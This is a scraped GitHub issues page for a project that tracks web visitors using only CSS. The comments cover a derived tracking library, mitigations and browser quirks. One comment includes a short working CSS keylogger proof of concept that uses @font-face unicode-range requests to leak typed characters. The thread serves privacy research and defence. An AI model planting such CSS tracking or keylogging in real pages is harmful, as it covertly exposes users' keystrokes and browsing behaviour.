jbtronics / crookedstylesheets Goto Github PK
View Code? Open in Web Editor NEWWebpage tracking only using CSS (and no JS)
License: MIT License
Webpage tracking only using CSS (and no JS)
License: MIT License
Hi. First of all thanks for your work.
Your code inspired me to write small library for tracking css (i call it spycss).
You can see sources at https://github.com/Bogdaan/spycss
And small demo at https://github.com/Bogdaan/spycss-demo (live demo - https://spycss.hcbogdan.com)
I will be grateful if you will advise what can be improved.
I just found a bug or something with css variables, and it seems to be an easy dos thing.
Check my repo: https://github.com/ceigh/css-dos
An other solution would be to block the ability to load dynamic content like php file.
What if you created an invisible css grid on top of your whole webpage and tracked mouse movement that way. (Sounds way easier and more enjoyable than wrapping everything separately in your markup somehow...
I don't mean this to be snarky or mean - Please consider revising the README without the rampant abuse of commas. Nearly every sentence has an unneeded pause introduced by a comma and it makes fluidly reading through your fascinating notes somewhat more difficult.
After developing the CSS detection in MS Edge, I was not able to detect the duration value.
I´m referring to this pull request where the detection was made for MS Edge -> #16
CSS Exfil Protection is an extension to protect against this vulnerability.
It should be added under What you can do to prevent tracking with this method
in the Readme.
So, disabling CSS is not a real option, except when you are very worried about your privacy (for example, when you are using the Tor browser, you should maybe disable CSS).
Actually not required because things like user agent, screen resolution, fonts, etc. are already normalized and should be more or less identical for all users of TBB.
Hello, neat CSS trick; it works great on newer browsers that support the CSS methods used. Older browser versions — I tested Firefox v50 and Opera v12 — respond to font tracking only, no other results show; other than that, the CSS on the test page works as expected; i.e., color changes appropriately, etc.
So this is not really a bug…but may be helpful as a mitigation method under the README's prevention section?
You can have the track.php
script return a 404
. The browser won't cache the response and attempt to get it again on the next event.
Demo page is dead (404); recreate it right on github.io?
Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:
<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log
completly
is in your README.md a few times where you actually want it to be completely
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.